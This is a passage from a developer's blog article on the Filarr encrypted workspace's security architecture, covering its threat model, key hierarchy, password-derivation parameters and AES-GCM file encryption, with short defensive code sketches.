Filarr security, layer by layer — the exhaustive defensive architecture
Threat model, cryptography, Electron hardening, comparisons with Signal / 1Password / Obsidian, real-world CVE walk-throughs. The complete guide to everything protecting your data — including from the servers hosting it.
Mathis Belouar-Pruvot
Quick Answer. Filarr protects your data with AES-256-GCM per-file encryption, a KEK/FEK key hierarchy derived from your password via PBKDF2-SHA-512 (600,000 iterations) and Argon2id, optional TOTP two-factor authentication, and zero-knowledge cloud sync where servers only see opaque encrypted blobs. Electron is hardened with full fuses, contextIsolation, sandboxing, and a strict CSP. Independently audited.
Update v2.3.1 (April 18, 2026): this article reflects the state of the code after the full security audit shipped in v2.2.1, the v2.2.2 crypto hardening (full Electron fuses + HKDF on pairing), and the v2.3.0 Electron 41 upgrade that fixed 18 CVEs accumulated in the 39 branch.
Filarr is a local-first encrypted workspace with zero-knowledge cloud sync. In practice, this means that your data never leaves your machine in cleartext, even when synced with the cloud: Filarr's servers only see opaque encrypted blobs they cannot decrypt, even under legal compulsion or infrastructure compromise. This promise isn't a marketing slogan — it's the mathematical consequence of an architecture where encryption keys never leave your device without first being encrypted by an ephemeral key the server cannot reconstruct.
The article below describes every security mechanism in place, with exact parameters, exact files, exact CVEs fixed, comparisons with other tools on the market, and technical references (NIST, RFCs, OWASP, academic papers) for every decision. No vague "military-grade", no artistic handwaving: if you want to audit the code, every choice is documented and traceable.
If you only have ten minutes, the summary section covers the essentials. Otherwise, settle in comfortably — defense in depth takes a while to unpack.
Table of contents
- Threat model: who we defend against, with what capabilities
- Zero-knowledge: what it actually means
- The key hierarchy: Password → KEK → FEK
- Argon2id and PBKDF2 — why Filarr uses both
- AES-256-GCM: choice, strengths, deadly pitfalls
- Two-factor authentication (2FA): TOTP, backup codes, what it actually protects
- Multi-device pairing: ECDH and HKDF under the hood
- Electron hardening — one app, three isolations
- Content Security Policy — what it actually blocks
- XSS sanitization: DOMPurify and known traps
- Anatomy of a kill chain: XSS → RCE (before/after v2.2.1)
- Supply chain: lessons from event-stream, ua-parser-js, node-ipc
- CVE history
- Comparison with other tools
- Security roadmap
- Summary
- References and further reading
1. Threat model
A threat model is only useful if it's honest about its limits. Announcing "Filarr is safe against all attackers" is a lie by omission. The real question is: which adversaries does Filarr defend you against, with what capabilities, and at what threshold do those defenses break. This section answers these three questions explicitly.
1.1 What we aim to protect
The surface to protect splits into four categories. The first, obvious, is user content: notes, files, associated metadata — folder names, tags, hierarchical structure, modification timestamps. The second is the group of encryption keys: the FEK (File Encryption Key) that encrypts everything else, the KEK (Key Encryption Key) derived from your password, and the ephemeral keys generated during multi-device pairing. The third is the integrity of the Electron binary itself: we want to guarantee that no attacker can run arbitrary code in the Filarr process, whether via command-line argument injection, patching the app.asar file on disk, or compromising an npm dependency. The fourth, finally, is availability: the app must not be usable as a denial-of-service vector (no ransomware via imported ZIP bomb, no reproducible crash from adversarial input).
These four categories are not treated uniformly. Content and keys benefit from strong cryptographic protection — an attacker reading the encrypted blobs can do nothing with them. Binary integrity rests on more subtle mechanisms (Electron fuses, ASAR validation, CSP) detailed in section 8. Availability is treated as a classic robustness objective: size caps, depth limits, strict validation.
1.2 Adversary profiles considered
Drawing on the STRIDE classification and the MITRE ATT&CK framework, we distinguish seven adversary profiles, each with its own capabilities and the defenses specific to it:
| Adversary | Capabilities | MITRE Tactic | Main defense |
|---|---|---|---|
| Compromised Filarr server (RCE, insider, subpoena) | Reads all blobs, forges API responses | T1565 (Data Manipulation) | Client-side zero-knowledge — technical impossibility of decryption |
| Network MitM (public café, hostile ISP, state actor) | Intercepts traffic, forges TLS responses | T1557 (Adversary-in-the-Middle) | TLS 1.3 + HSTS + implicit pinning (fixed endpoint) + strict new URL() validation |
| User-level local malware (trojan in a downloaded .exe) | Reads home directory, observes timing, injects env vars | T1059 (Command and Scripting Interpreter), T1055 (Process Injection) | Electron fuses (RunAsNode: false, EnableNodeOptionsEnvironmentVariable: false), constant-time comparisons, IPC allowlist |
| Renderer XSS (booby-trapped note, hostile Obsidian import) | Executes JS in the app with renderer privileges | T1189 (Drive-by Compromise) | contextIsolation: true, sandbox: true, strict IPC allowlist, defensive DOMPurify with widened FORBID_TAGS |
| npm supply chain (dependency corrupted via account takeover) | Injects code into a package we load | T1195.002 (Compromise Software Supply Chain) | Quarterly npm audit, restrictive CSP, fuses, ASAR integrity validation |
| Offline physical access (stolen laptop) | Full disk access without active session | T1005 (Data from Local System) | FEK sealed in OS keychain (DPAPI/Keychain/libsecret), Enhanced Lock mode wipes .fek_safe on close |
| Cloud provider (Cloudflare, R2) | Reads all bucket objects | T1530 (Data from Cloud Storage) | Objects encrypted client-side — the FEK never exists on R2, even temporarily |
Each row corresponds to a distinct attack surface with its own chain of mitigations. We can defend against a compromised server (client-side encryption) but not against a local root (which can dump RAM); we can block renderer XSS (contextIsolation + sandbox) but can't prevent a user from choosing password123. Defense in depth means covering each row with independent layers so that a single break doesn't compromise everything.
1.3 What we don't claim to protect against
For intellectual honesty, several attack classes are explicitly out of scope. Stating them clearly avoids misunderstandings: Filarr isn't designed for these use cases, and an exposed user should use other tools.
First, an attacker with root, admin, or SYSTEM privileges on your machine can bypass all software defenses. They can dump the Filarr process memory (reading the FEK in cleartext while it's in RAM), directly patch the binary to disable checks, or install a keylogger that captures your password the moment you type it into the app. No user-space software resists an attacker who has the same privileges as the operating system: OS-level defense (Windows Defender on Windows, SELinux/AppArmor on Linux, XProtect and Gatekeeper on macOS) is the right layer for that fight. Filarr doesn't pretend to replace these layers.
Next, a trivial password renders any cryptography useless. If your password is password2024, no 600,000-iteration key derivation saves you from a targeted GPU bruteforce. With 8 modern RTX 4090 GPUs, SHA-512 runs at about 20 gigahashes per second (Hashcat benchmarks 2024), enough to exhaust a 10^10 common-word dictionary in under a second. PBKDF2 multiplies that time by 600,000, stretching the attack to a few days rather than a fraction of a second — still within reach of a motivated adversary facing a weak password. You're the weakest link, not the crypto.
Third, Filarr is not designed to resist a nation-state with firmware access. If your adversary can install an implant at the BIOS level, Intel Management Engine, or hard drive firmware, you're lost regardless of application-level encryption quality. For this threat model — journalists under authoritarian dictatorships, political dissidents, whistleblowers — the appropriate tools are Qubes OS for compartmentalized isolation, Tails for ephemeral trace-free use, and Signal for communication. Filarr is a productivity tool with strong encryption for privacy-conscious mainstream users, not a state-device circumvention tool.
Finally, and this is probably the most important point for the average user: if you forget your password AND your recovery phrase, your data is permanently lost. It's the unavoidable cost of zero-knowledge. There's no hidden "administrator password" a support team could use to rescue you, because if it existed, it would exist for anyone who compromises Filarr too. This asymmetry is the price to pay so that no one — not even us — can read your data without your explicit consent.
2. Zero-knowledge
The term "zero-knowledge" has become a diluted marketing buzzword that has lost its meaning. In formal cryptography, a zero-knowledge proof refers to a very precise protocol where a prover convinces a verifier of the truth of a fact without revealing anything else. zk-SNARK protocols used by Zcash or Ethereum rollups are examples. Filarr implements nothing of the sort — claiming otherwise would be a misuse of the term.
What Filarr implements is what's more precisely called zero-knowledge storage or end-to-end encryption at rest, in the sense used by Bitwarden, ProtonDrive, Tresorit or 1Password: the server receives data, stores it, retransmits it, but has no means of decrypting it. This property is ensured not by a sophisticated cryptographic proof but by a strict architectural invariant: encryption keys never transit through the server in cleartext.
To make this promise concrete, imagine a Filarr server receiving a user note containing the text "I am David". What the server literally sees is a byte sequence of the form:
[4 bytes FEK marker]
[12 bytes random nonce]
2f 8a c3 d1 7e ... (ciphertext ~98 bytes)
[16 bytes authentication tag]
This sequence is indistinguishable from a random sequence of the same size to anyone without the FEK. That's a formal property called IND-CCA2 (indistinguishability under adaptive chosen-ciphertext attack), proven for authenticated encryption like AES-GCM by Bellare and Namprempre in 2008. In other words, even if an attacker can submit arbitrary ciphertexts to the server and observe responses, they can deduce nothing about a blob's content beyond its length — not the language, not the presence of repeating patterns. The ciphertext is as informative as a stream of random data.
For this property to hold, the architecture imposes an absolute red line: the server must never touch the FEK in cleartext, at any time, in any form. This line materializes in several practical prohibitions. There IS a copy of your master key stored server-side — it's needed so you can log in from a new device without manually pairing it with another, already-unlocked one — but that copy is encrypted by a key derived from your password via PBKDF2-SHA-512 with 600,000 iterations, and the server never sees your password. Without that password, the encrypted copy is an inert blob: it therefore does not let Filarr decrypt your files, nor let us recover your account if you lose your password. This is exactly the same model as Bitwarden's ProtectedSymmetricKey and ProtonMail's encrypted private keys: the server-side copy exists to enable multi-device, not to bypass the crypto. There's no "administrator master key" that would decrypt all accounts when needed, because such a key would immediately be a prime target for an attacker compromising the server. No key derivation is performed server-side, not even intermediate: the entire cryptographic chain from password to FEK takes place in the browser or Electron main process. And finally, when the FEK must transit to a new device via direct pairing (both devices together, without going through the password), the FEK is encrypted by an ephemeral key derived via ECDH between the two devices, whose private parts the server has never seen — it only sees an already-encrypted blob it cannot open (see §7).
This architectural discipline is the same as that of Signal, 1Password, Bitwarden, ProtonMail, and Tresorit. It works under one necessary condition: the client code must be honest. If the client secretly sent the FEK to the server in a custom HTTP header, the entire construction would collapse. That's precisely why source code transparency matters, and why the "trust but verify" approach — code is public, mechanisms are documented, external audit is planned — is the backbone of trust rather than any marketing discourse.
3. The key hierarchy
At Filarr's heart is a classic but rigorously applied two-level cryptographic architecture: a random master key that encrypts all user data, and a password-derived key that encrypts the master key. This separation isn't a detail — it enables several critical features we'll detail, and it's the standard pattern adopted by all serious modern encryption tools.
3.1 The FEK, root key encrypting all content
The File Encryption Key, abbreviated FEK, is a symmetric 256-bit key generated locally the first time you create a profile. It's produced by a call to crypto.getRandomValues(), which guarantees a CSPRNG (cryptographically secure pseudo-random number generator) source of OS-level quality: on Windows it's CryptGenRandom fed by RtlGenRandom and modern hardware entropy sources; on Linux it's /dev/urandom fed by kernel entropy accumulated since boot; on recent macOS it's CCRandomGenerateBytes based on the OS Fortuna generator. The quality of this source is fundamental — a predictable FEK would compromise everything — which is why we never generate it via Math.random() or other functions that aren't explicitly cryptographic.
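To make this concrete, here's a minimal sketch of that generation step — the function name is illustrative, not Filarr's actual code:
function generateFEK(): Uint8Array {
  const fek = new Uint8Array(32);   // 32 bytes = 256 bits
  crypto.getRandomValues(fek);      // filled from the OS CSPRNG — never Math.random()
  return fek;
}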
This single 256-bit key is used to encrypt absolutely all user content: every file individually (with a unique nonce per file to avoid any collision), every note taken in the editor, all associated metadata — folder names, hierarchical notebook structure, tags associated with notes, creation and modification dates — and finally the cloud sync manifest, that special file listing all blobs present on R2 with their identifiers and versions. This manifest is itself encrypted so as not to reveal to the server the structure of your vault (even if we don't see file contents, knowing you have precisely 47 notes with such a link graph would already be an information leak).
The inviolable rule around the FEK is that it must never leave the device in cleartext. Not in an error log file, not in any API request payload, not in an automatic backup to a third-party service, not in an exception message shown to the user. The FEK can, however, leave a device in two circumstances, each time in encrypted form. During cloud sync, it leaves wrapped by your KEK (itself derived from your password) — the server never sees your password and therefore cannot unwrap it, as detailed in §2. During direct multi-device pairing, it's encrypted by an ephemeral key derived via Diffie-Hellman between the two devices involved — a key that neither the Filarr server nor any third party can reconstruct. Protocol details are in section 7.
3.2 Why not encrypt directly with the password?
An attentive reader might ask why not simply derive a key from the password and encrypt files directly with it. The answer boils down to one phrase: password change UX. If we encrypted files with a key derived directly from the password, changing the password would mean re-encrypting every file with the new key. For a 50 GB vault containing 10,000 files, this operation would take hours, saturate the disk, and break at any interruption — a functional nightmare that would deter any user from ever changing their password.
The standard pattern, used by 1Password, Bitwarden, Keeper, LastPass, Signal, and every serious tool, therefore separates two keys with distinct roles. The KEK (Key Encryption Key) is derived from the password via an expensive key derivation function; it changes whenever the password changes. The FEK is random, generated once at profile creation, and encrypted ("wrapped") by the KEK in a wrapped_fek.json file stored locally — and, for cloud accounts, mirrored server-side in that same encrypted form so you can log back in from a new device without going through a direct pairing. Changing the password therefore simply means deriving a new KEK, re-wrapping the FEK with it, writing the new wrapped_fek.json locally and pushing it to the server — an operation taking milliseconds and touching zero encrypted files.
This design offers an unexpected but essential bonus: it allows multiple KEKs to protect the same FEK. This is exactly what Filarr does for the recovery key: when you export your recovery key, we derive an alternative KEK from a password you choose specifically for this export (distinct from the main vault password), we wrap the same FEK with this alternative KEK, and we store the result in a JSON file you archive offline. If you lose your vault password, you can restore access to all your data via this recovery file — provided of course you haven't also lost the export password.
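Here's a sketch of the wrap/re-wrap mechanics, assuming a hypothetical deriveKEK helper implementing the KDFs of section 4 — the shape of the pattern, not Filarr's exact code:
// Wrap the FEK under a KEK; the result is what wrapped_fek.json persists.
async function wrapFEK(fek: Uint8Array, kek: CryptoKey) {
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const wrapped = await crypto.subtle.encrypt({ name: 'AES-GCM', iv }, kek, fek);
  return { iv, wrapped };
}

// Changing the password re-wraps the same FEK: zero files are re-encrypted.
async function changePassword(fek: Uint8Array, newPassword: string, salt: Uint8Array) {
  const newKek = await deriveKEK(newPassword, salt);  // hypothetical helper, see §4
  return wrapFEK(fek, newKek);
}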
3.3 Unlocked FEK persistence via the OS keychain
Once you've entered your password at launch, the KEK is derived, the FEK is unwrapped, and the FEK is in RAM. Re-requesting the password at each launch would be unbearable in practice — no user accepts that durably. The standard solution, widely adopted by modern desktop apps, is to persist the unlocked FEK in the operating system keychain, which encrypts the FEK with a key derived from your active user session.
On Windows 10 and above, we use the DPAPI (Data Protection API) exposed by Electron as safeStorage.encryptString(). DPAPI encrypts data with a key derived from a mixture of your Windows session hash, machine-specific entropy (non-exportable), and user-specific entropy. Result: the encrypted file is unreadable from another user account on the same machine, unreadable if copied to another machine, and unreadable if your Windows session is closed.
On macOS, the same Electron API hooks into Keychain Services. The system keychain is itself unlocked by your session password or Touch ID; its master key is sealed in the Secure Enclave on recent Macs, making it resistant even to an attacker with physical access to the machine.
On Linux, the abstraction goes through libsecret, which can rely on gnome-keyring or kwallet depending on the desktop environment. The key is derived at login, and the daemon keeps it in RAM until logout. On minimal distributions without a keychain daemon, the API can return "encryption not available".
The resulting file, named .fek_safe and stored in the Filarr profile folder, is therefore unreadable even by yourself outside an active session. On top of that, we apply Unix permissions 0o600 (read-write for owner only) on all platforms, which also blocks access from other non-privileged processes running under the same user.
An important behavior change was introduced in v2.2.1 regarding the case where the keychain is unavailable: previously, hybrid:storeFEK silently returned false without persisting the FEK. This design left the door open for a future developer, wanting to "simplify life for Linux users without a keychain", to inadvertently add a cleartext fallback. Now the call throws an explicit error that surfaces to the user: "OS keychain unavailable, vault password required at each launch". It's less pleasant UX-wise, but it's the right choice — no implicit fallback that could one day degrade into "we write the FEK in cleartext so it works anyway". The underlying principle is fail-closed rather than fail-open: when in doubt, refuse, don't improvise.
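In sketch form, that fail-closed behavior through Electron's safeStorage looks like this — function name and path are illustrative:
import { safeStorage } from 'electron';
import { promises as fs } from 'node:fs';

async function storeFEK(fekBase64: string, safePath: string): Promise<void> {
  if (!safeStorage.isEncryptionAvailable()) {
    // Fail closed: no cleartext fallback, the error surfaces to the user.
    throw new Error('OS keychain unavailable, vault password required at each launch');
  }
  const sealed = safeStorage.encryptString(fekBase64);    // DPAPI / Keychain / libsecret
  await fs.writeFile(safePath, sealed, { mode: 0o600 });  // owner read-write only
}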
3.4 Enhanced Lock and auto-lock
For users whose threat model is more demanding, Filarr provides two complementary mechanisms that reduce the window during which the FEK is accessible in memory.
Enhanced Lock mode, once activated, deletes the .fek_safe file on every app close. Concretely, the FEK no longer persists between sessions: each launch requires retyping the vault password. It's the mode to favor if you physically share your machine with others, if you travel with a laptop that could be seized at a border, or simply if you prefer to accept the UX cost of a password at each launch in exchange for a reduced attack surface.
Auto-lock, configurable at 5, 15, 30 or 60 minutes of inactivity, acts during sessions. After the chosen delay without user interaction, Filarr overwrites the FEK in renderer memory (filling the Uint8Array with zeros, removing references), displays the lock screen, and requires PIN entry (or full password depending on config). An attacker accessing your machine during your coffee break would no longer find the FEK in the Electron process memory — or at least not in the JavaScript references managed by the garbage collector.
On this last point, mandatory intellectual honesty: in JavaScript, "wiping memory" doesn't have the strict guarantee you get in Rust or C with functions like memset_s. The V8 engine may have already copied the FEK during its internal optimizations (inlining, young-to-old space promotions), and the garbage collector doesn't immediately zero these copies. For a forensic-level adversary capable of dumping RAM in real time with a tool like Volatility or directly via a DMA attack over Thunderbolt, there's still a window where FEK fragments can be recovered. It's an intrinsic limitation of the JavaScript runtime, not an implementation choice. For a classic user-level malware adversary or a curious colleague who sits at your keyboard, the protection is effective.
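For reference, the best-effort wipe looks something like this — with all the V8 caveats above, a sketch rather than a memset_s-grade guarantee:
function lockVault(state: { fek: Uint8Array | null }) {
  if (state.fek) {
    state.fek.fill(0);  // overwrite the bytes we still hold a reference to
    state.fek = null;   // drop the reference so the GC can reclaim it
  }
}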
4. Argon2id and PBKDF2
All at-rest encryption security depends, ultimately, on the quality of the key derivation function (KDF) that transforms your password into a cryptographic key. A 10-character password carries at best about 40 to 50 bits of entropy — far too little to resist direct bruteforce. The KDF's role is to slow each derivation attempt to the point of making bruteforce economically prohibitive for an attacker, while keeping latency acceptable for the legitimate user who derives one key per launch.
Filarr uses two different KDFs depending on execution context, and it's a conscious decision worth explaining because it can surprise.
4.1 Why two KDFs?
On the Node.js main process side, where all native libraries are available, we use Argon2id via the node-argon2 package. It's the KDF of choice in 2026, winner of the Password Hashing Competition in 2015 and standardized by RFC 9106 in 2021.
On the renderer side (embedded Chromium browser), we don't have access to Argon2. The reason is unpleasant but real: the Web Crypto API exposed by browsers still doesn't support Argon2 in 2026, despite an open W3C debate since 2019. Successive proposals to add it (exposing "Argon2" as an algorithm name to deriveKey / deriveBits) never succeeded, mainly because native browser implementations were deemed too costly to maintain uniformly. So we're forced to fall back on PBKDF2-SHA-512 as an acceptable modern alternative.
This hybridization isn't ideal — we'd prefer to use Argon2id everywhere — but it reflects the platform's real constraint. The alternative would be to compile a WASM implementation of Argon2 and load it in the renderer, but this would introduce loading overhead (~100-200 KB of WASM), a third-party dependency to maintain, and complications in validating the WASM binary's integrity. We judged the hybrid solution a better compromise, at least until the Web Crypto API standardizes Argon2.
4.2 Argon2id parameters and why these values
When we use Argon2id in the main process, the configuration is:
const ARGON2_OPTIONS = {
type: argon2.argon2id,
memoryCost: 65536, // 64 MB RAM per hash
timeCost: 3, // 3 passes
parallelism: 4, // 4 threads
hashLength: 32, // 256-bit output
};
These values exactly match the 2024 OWASP Password Storage Cheat Sheet recommendation for Argon2id. They result from calibration balancing three objectives: being costly enough to discourage an attacker, being fast enough not to frustrate the user, and being RAM-frugal enough to run on entry-level machines.
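For reference, deriving a raw 256-bit KEK with node-argon2 and these options looks roughly like this — the surrounding function name is illustrative:
import argon2 from 'argon2';

async function deriveKekArgon2(password: string, salt: Buffer): Promise<Buffer> {
  return argon2.hash(password, {
    ...ARGON2_OPTIONS,  // type, memoryCost, timeCost, parallelism, hashLength
    salt,               // 16 random bytes per user, stored alongside (see §4.4)
    raw: true,          // return the 32 raw bytes rather than an encoded string
  });
}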
Why the Argon2id variant rather than Argon2d or Argon2i? The three variants defined by the standard only differ in their behavior against side-channel and GPU attacks. Argon2d is the most GPU-resistant but vulnerable to side-channel attacks: its memory access pattern depends on secret data, allowing an attacker observing the cache hierarchy (for example via Flush+Reload on a shared server) to deduce password bits. Argon2i is designed to be side-channel-resistant (data-independent memory access) but loses GPU resistance. Argon2id is the hybrid variant using Argon2i during the first pass (when the password is processed and side-channels are most dangerous) and Argon2d during subsequent passes (when data is already mixed and GPU resistance matters). It's the default recommendation since RFC 9106 for any general use.
The choice of 64 MB of memory per hash is the core of anti-GPU defense. A modern GPU like an RTX 4090 has about 16,000 compute cores and 24 GB of VRAM. It can efficiently parallelize SHA-256 operations where each thread only needs a few kilobytes. But Argon2id with 64 MB per hash means we can only have 24/0.064 ≈ 375 parallel hashes per GPU, versus millions for SHA-256 alone. Parallelization collapses, and cost per hash explodes. This is what's called a memory-hard function: designed to make parallel attack economically prohibitive rather than just slow.
4.3 PBKDF2-SHA-512 parameters
When Argon2 isn't available (renderer side), we use PBKDF2 with this configuration:
{
name: 'PBKDF2',
salt, // 16 random bytes per user
iterations: 600000,
hash: 'SHA-512',
}
600,000 iterations with SHA-512 is nearly three times the OWASP 2024 recommendation (210,000 iterations for PBKDF2-HMAC-SHA-512; the often-quoted 600,000 figure applies to SHA-256). Why overshoot? Simply because the cost is invisible to the user (about 500 ms on an average laptop) and margin over the recommendations gives some breathing room against GPU progress in coming years.
The choice of SHA-512 rather than SHA-256 deserves explanation. Both SHA variants have equivalent cryptographic properties, but SHA-512 processes 1024-bit blocks at each iteration (vs 512 for SHA-256). On a modern 64-bit CPU, SHA-512 is actually faster per byte processed than SHA-256, because it natively operates on 64-bit registers. But on a GPU, this advantage partially reverses: GPUs are optimized for 32-bit operations, and SHA-512 forces them to simulate 64-bit operations, introducing overhead. The empirically measured result (Black Hat 2015) is that the GPU gain ratio on SHA-512 is about 2×, versus 10× for SHA-256. In other words, each PBKDF2-SHA-512 iteration is approximately 5× more resistant to GPU attack than PBKDF2-SHA-256 at equal iteration count. Not huge, but free.
A related choice we've sometimes been asked about is why not 1 million or 2 million iterations rather than 600,000. The answer is a UX question: on a tired i5 laptop from 2018, 600,000 iterations takes about 500 ms. Beyond that, the user visibly perceives a wait at each unlock, and accumulated friction discourages regular app use. The real security gain comes from Argon2id (memory-hard) rather than from pushing PBKDF2 to astronomical iteration counts, which raise the attacker's cost only linearly — at exactly the same rate they raise yours.
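In code, the renderer-side derivation through Web Crypto looks like this — a sketch; the function name is illustrative and the parameters are exactly those above:
async function deriveKekPbkdf2(password: string, salt: Uint8Array): Promise<CryptoKey> {
  const material = await crypto.subtle.importKey(
    'raw', new TextEncoder().encode(password), 'PBKDF2', false, ['deriveKey'],
  );
  return crypto.subtle.deriveKey(
    { name: 'PBKDF2', salt, iterations: 600_000, hash: 'SHA-512' },
    material,
    { name: 'AES-GCM', length: 256 },  // the KEK that wraps the FEK
    false,                             // non-extractable
    ['encrypt', 'decrypt'],
  );
}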
4.4 The salt, always unique, always random
Last derivation element: the salt. Filarr uses a 16-byte (128-bit) salt generated randomly by crypto.getRandomValues() for each user, stored alongside the hash. Never derived from username, never constant between users, never derived from email. Two classic reasons justify this discipline.
The first is that random salt makes rainbow tables useless — those huge attacker precomputations that map common passwords to their hashes. With a different salt per user, a rainbow table valid for user Alice isn't reusable for user Bob, even if both chose the same password.
The second is anti-replication between users: if Alice and Bob both choose the password hunter2 (a classic), their derived hashes will be totally different thanks to the random salt. An attacker compromising a database cannot detect this collision — which would be very valuable information, as it would let them deduce that if one of the two passwords is cracked, the other is too.
4.5 Comparison with other tools
To place Filarr in the ecosystem, here are the KDF choices of some known tools:
| Tool | KDF | Parameters | Comment |
|---|---|---|---|
| Filarr (v2.3) | PBKDF2-SHA-512 (renderer) + Argon2id (main) | 600k iter / m=64MB t=3 p=4 | Web Crypto has no Argon2 — forced mix |
| Bitwarden | PBKDF2-SHA-256 | 600k iter (2023 default) | Argon2id migration ongoing |
| 1Password | PBKDF2-SHA-256 + Secret Key | 650k iter | The Secret Key (256-bit stored separately) doubles security |
| Signal | HKDF-SHA-256 (not strictly a password KDF) | N/A | Signal has no user password — everything derives from PIN + Secure Value Recovery |
| KeePassXC | Argon2id (or legacy AES-KDF) | Configurable | State of the art desktop |
| LastPass | PBKDF2-SHA-256 | 100k iter (scandalous in 2024 — see 2022 incident) | Avoid |
Filarr sits at the top of the table thanks to Argon2id on the main process side and doubled PBKDF2 iterations on the renderer side. The only tool with fundamentally stronger defense is 1Password, thanks to their Secret Key — a 256-bit key the user stores off-server (on a printed QR code, for example) that combines with the password to derive the final KEK. We considered this model for Filarr but the UX degradation (must handle an additional file alongside the password at each new device) was deemed incompatible with the tool's mainstream target.
5. AES-256-GCM
Each file and note in Filarr is encrypted individually — no inter-file chaining — with AES-256 in GCM mode (Galois/Counter Mode), standardized by NIST SP 800-38D in 2007. This choice isn't debated in the modern cryptographic community, but it deserves explanation of why it's this one rather than another mode and what traps to avoid when using it.
5.1 Exact ciphertext structure
On disk, an encrypted file has the following structure:
[4 bytes FEK marker = 0x46 0x45 0x4B 0x01] # identifies format v1
[12 bytes random nonce] # unique per encryption
[variable-length ciphertext]
[16 bytes GCM authentication tag]
The 4-byte marker is a format field that lets Filarr handle backward compatibility with profiles migrated from v1.x (where encryption used a local key rather than the FEK). Decryption reads the first 4 bytes, recognizes the format, and routes to the right code path. It's defensive cryptographic versioning — the day we migrate to another algorithm (for example adding post-quantum Kyber), this same mechanism will handle mixed formats during transition.
The 12 bytes of nonce are public and stored in cleartext alongside the ciphertext. That's normal and safe in GCM, as we'll detail below. The ciphertext proper is exactly plaintext size (GCM is a "streaming" mode without padding), and the last 16 bytes are the authentication tag that will let decryption detect any modification.
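Producing this layout with Web Crypto looks roughly like this — the marker constant and the assembly are a sketch of the format, not the exact implementation:
const FEK_MARKER = new Uint8Array([0x46, 0x45, 0x4b, 0x01]); // format v1

async function encryptBlob(plaintext: Uint8Array, fek: CryptoKey): Promise<Uint8Array> {
  const nonce = crypto.getRandomValues(new Uint8Array(12));  // unique per encryption
  // Web Crypto returns the ciphertext with the 16-byte GCM tag already appended.
  const ct = new Uint8Array(
    await crypto.subtle.encrypt({ name: 'AES-GCM', iv: nonce }, fek, plaintext),
  );
  const out = new Uint8Array(4 + 12 + ct.length);
  out.set(FEK_MARKER, 0);   // [0..4)   format marker
  out.set(nonce, 4);        // [4..16)  public nonce
  out.set(ct, 16);          // [16..)   ciphertext ++ tag
  return out;
}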
5.2 Why GCM rather than CBC, CTR or ChaCha20?
The landscape of symmetric encryption modes is more nuanced than it appears. Here are the main candidates and their trade-offs:
| Mode | Confidentiality | Integrity | Perf | Side-channel | Verdict |
|---|---|---|---|---|---|
| AES-ECB | ❌ (pattern leak) | ❌ | Fast | Resistant | Banned |
| AES-CBC | ✅ | ❌ (not authenticated) | Medium | Padding oracle risk | Avoid alone |
| AES-CBC + HMAC | ✅ | ✅ | Slow (2 passes) | OK | OK but complex |
| AES-CTR | ✅ | ❌ | Fast | OK | Avoid alone |
| AES-GCM | ✅ | ✅ (AEAD) | Fast (hw accel) | Good (except nonce reuse) | Modern standard |
| ChaCha20-Poly1305 | ✅ | ✅ (AEAD) | Fast (soft) | Very good | Alternative if no AES-NI |
AES-GCM is the modern default choice for three combined reasons. First, it combines encryption and authentication in a single construction (AEAD, Authenticated Encryption with Associated Data): the 16-byte tag detects any ciphertext modification, with forgery probability around 2^-128. So we don't have to manually combine encryption (CBC) with a MAC (HMAC), a construction that has historically ended badly in naive implementations (see Encrypt-then-MAC vs MAC-then-Encrypt vs Encrypt-and-MAC, and TLS 1.0's disasters with the wrong choice).
Next, AES-GCM benefits from AES-NI hardware acceleration present on all x86-64 CPUs since ~2010 (Intel) and all ARM64 with Cryptography extensions since ARMv8. A modern core reaches about 5 gigabytes per second in AES-GCM, making encryption cost negligible compared to I/O cost in practice. The ChaCha20-Poly1305 alternative is also very fast but in pure software; it becomes preferable on AES-NI-less platforms (low-end ARM mobile, for example), but for a desktop Electron app, AES-GCM is optimal.
Finally, AES-GCM is a FIPS 140-2 standard, natively supported everywhere: Web Crypto API, Node.js crypto, OpenSSL, libsodium, BoringSSL. It's used by TLS 1.3 as the default cipher suite, by Signal to encrypt messages, by Age to encrypt files, by AWS for KMS. It's the field consensus.
5.3 The deadly trap: Forbidden Attack and nonce reuse
AES-GCM has a catastrophic weakness you must know: reusing a nonce with the same key completely destroys security. Not "a bit dangerous" in the sense of losing a few security bits — total, allowing an attacker not only to decrypt but also to forge arbitrary ciphertexts that will pass verification.
Technically, if an attacker observes two ciphertexts C1 and C2 encrypted with the same (K, N) pair, they can first compute C1 ⊕ C2 = P1 ⊕ P2, revealing the linear combination of plaintexts. Then, by solving the polynomial system over the Galois field GF(2^128) underlying GCM, they can recover the internal authentication key H = AES_K(0^128). With H in hand, the attacker can compute the GCM tag of any ciphertext they construct, and thus forge arbitrary authenticated ciphertexts. This attack, described by Böck, Zauner and Devlin in their 2016 paper Nonce-Disrespecting Adversaries, was demonstrated the same year against real HTTPS servers observed repeating nonces in the wild; the same Internet-wide scan flagged roughly 70,000 more servers whose nonce generation put them at risk of collision.
Filarr protects against this attack class through strict discipline: at each encryption, we call crypto.getRandomValues(new Uint8Array(12)) to produce 12 nonce bytes from a CSPRNG source. With 2^96 possible nonces and n files encrypted under the same FEK, collision probability follows the birthday paradox: about n² / 2^97. For a user to encrypt 2^32 files (four billion), collision probability is on the order of 2^-33 — negligible. In practice, an average user encrypts at most 2^20 files over the lifetime of their profile, giving collision probability of 2^-57: unreachable.
We never generate the nonce via a counter incremented and persisted, even though it's theoretically more random-frugal. The reason: a crash between increment and counter writing could cause nonce reuse at restart, which is precisely the catastrophic scenario. Cryptographic randomness at each encryption is slightly more CPU-costly but eliminates this bug class by construction.
5.4 The nonce is public, and that's intentional
A frequent confusion concerns the nature of the nonce: many people consider it an additional secret, by analogy with the key. Wrong. In GCM, the nonce isn't a secret; it fills the IV (initialization vector) role and is public by design. It's stored in cleartext alongside the ciphertext and transmitted with it. Only its reuse with the same key is forbidden — it's not nonce confidentiality that matters, it's uniqueness.
5.5 What exactly does the GCM tag authenticate?
The 16-byte tag at the end of the ciphertext simultaneously authenticates three things. First the ciphertext itself: any modification, even of a single bit, invalidates the tag and decryption fails. Next the associated data (AAD, Additional Authenticated Data) if provided — Filarr doesn't use it but the API field exists, and it could serve to bind a ciphertext to public metadata (for example the cleartext file identifier), preventing an attacker from swapping it between files. Finally, implicitly, the nonce and key: a tag computed with a different (K, N) pair won't verify, so an attacker trying to decrypt with the wrong key gets an error rather than silently corrupted plaintext.
An important API detail: when crypto.subtle.decrypt() detects an invalid tag, it throws an exception rather than returning partial plaintext. This is the formal definition of AEAD — never any return of unauthenticated data, ever. An attacker trying to modify the ciphertext to obtain even a small fragment of plaintext runs into this absolute Web Crypto guarantee.
